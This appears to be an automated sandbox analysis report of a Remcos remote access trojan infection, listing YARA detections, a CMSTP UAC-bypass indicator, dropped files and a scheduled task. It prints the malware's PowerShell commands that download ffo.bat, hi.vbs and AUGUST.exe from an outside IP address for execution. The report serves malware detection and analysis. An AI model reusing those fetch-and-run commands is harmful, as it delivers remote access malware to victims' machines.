Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5972, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPED

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5972, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: 27.2.explorer.exe.4bedb57.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 23.2.explorer.exe.4dbab57.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.cmd.exe.4a65b57.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 25.2.cmd.exe.55cfa8a.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.explorer.exe.4e79b57.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.cmd.exe.4a20a8a.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.explorer.exe.4e34a8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.DZIPR.exe.35b39ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 23.2.explorer.exe.4d75a8a.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 27.2.explorer.exe.4bee757.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 21.2.cmd.exe.55eea8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.DZIPR.exe.35b45ce.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 25.2.cmd.exe.5615757.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 21.2.cmd.exe.5634757.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.cmd.exe.4a66757.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.explorer.exe.4e7a757.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 25.2.cmd.exe.5614b57.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.DZIPR.exe.356e901.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 21.2.cmd.exe.5633b57.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 23.2.explorer.exe.4dbb757.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 27.2.explorer.exe.4ba8a8a.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001C.00000002.3213654065.0000000002F1B000.00000004.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: cmd.exe PID: 5476, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: cmd.exe PID: 5900, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: explorer.exe PID: 4016, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: cmd.exe PID: 1488, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: explorer.exe PID: 4256, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: explorer.exe PID: 5972, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPED	Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPED	Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPED	Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\AUGUST.exe

Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD10D95 NtdllDefWindowProc_W,	20_2_6FD10D95
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD12932 _memset,NtdllDefWindowProc_W,	20_2_6FD12932
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD0E5F6 NtdllDefWindowProc_W,CallWindowProcW,	20_2_6FD0E5F6

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows\Tasks\lnfast_x64.job

Jump to behavior

Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Code function: 14_2_00404FAA	14_2_00404FAA
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Code function: 14_2_0041206B	14_2_0041206B
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Code function: 14_2_0041022D	14_2_0041022D
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Code function: 14_2_00411F91	14_2_00411F91
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA65E70	15_2_6FA65E70
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA663F0	15_2_6FA663F0
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA75FB7	15_2_6FA75FB7
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA83E3B	15_2_6FA83E3B
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA7AE45	15_2_6FA7AE45
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA71D85	15_2_6FA71D85
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA65CA0	15_2_6FA65CA0
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA82CBB	15_2_6FA82CBB
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA76C6C	15_2_6FA76C6C
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA8586C	15_2_6FA8586C
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA76860	15_2_6FA76860
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA617D0	15_2_6FA617D0
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA61730	15_2_6FA61730
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA61739	15_2_6FA61739
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA83743	15_2_6FA83743
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA7648C	15_2_6FA7648C
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA831FF	15_2_6FA831FF
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA7708C	15_2_6FA7708C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C535E70	16_2_6C535E70
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C5363F0	16_2_6C5363F0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C546C6C	16_2_6C546C6C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C552CBB	16_2_6C552CBB
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C535CA0	16_2_6C535CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C541D85	16_2_6C541D85
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C54AE45	16_2_6C54AE45
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C553E3B	16_2_6C553E3B
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C545FB7	16_2_6C545FB7
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C546860	16_2_6C546860
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C55586C	16_2_6C55586C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C54648C	16_2_6C54648C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C553743	16_2_6C553743
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C531731	16_2_6C531731
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C531730	16_2_6C531730
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C5317D0	16_2_6C5317D0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C54708C	16_2_6C54708C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C5531FF	16_2_6C5531FF
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD05E70	20_2_6FD05E70
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD063F0	20_2_6FD063F0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD15FB7	20_2_6FD15FB7
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD1AE45	20_2_6FD1AE45
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD23E3B	20_2_6FD23E3B
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD11D85	20_2_6FD11D85
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD22CBB	20_2_6FD22CBB
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD05CA0	20_2_6FD05CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD16C6C	20_2_6FD16C6C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD16860	20_2_6FD16860
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD2586C	20_2_6FD2586C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD017D0	20_2_6FD017D0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD23743	20_2_6FD23743
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD01730	20_2_6FD01730
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD01731	20_2_6FD01731
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD1648C	20_2_6FD1648C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD231FF	20_2_6FD231FF
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD1708C	20_2_6FD1708C

Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Code function: String function: 0040243B appears 37 times
Source: C:\Users\user\DZIPR.exe	Code function: String function: 6FA753BC appears 48 times
Source: C:\Users\user\DZIPR.exe	Code function: String function: 6FA750C9 appears 66 times
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: String function: 6C5453BC appears 48 times
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: String function: 6FD153BC appears 48 times
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: String function: 6C5450C9 appears 65 times
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: String function: 6FD150C9 appears 65 times

Source: 27.2.explorer.exe.4bedb57.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 23.2.explorer.exe.4dbab57.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.cmd.exe.4a65b57.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 25.2.cmd.exe.55cfa8a.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.explorer.exe.4e79b57.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.cmd.exe.4a20a8a.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.explorer.exe.4e34a8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.DZIPR.exe.35b39ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 23.2.explorer.exe.4d75a8a.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 27.2.explorer.exe.4bee757.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 21.2.cmd.exe.55eea8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.DZIPR.exe.35b45ce.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
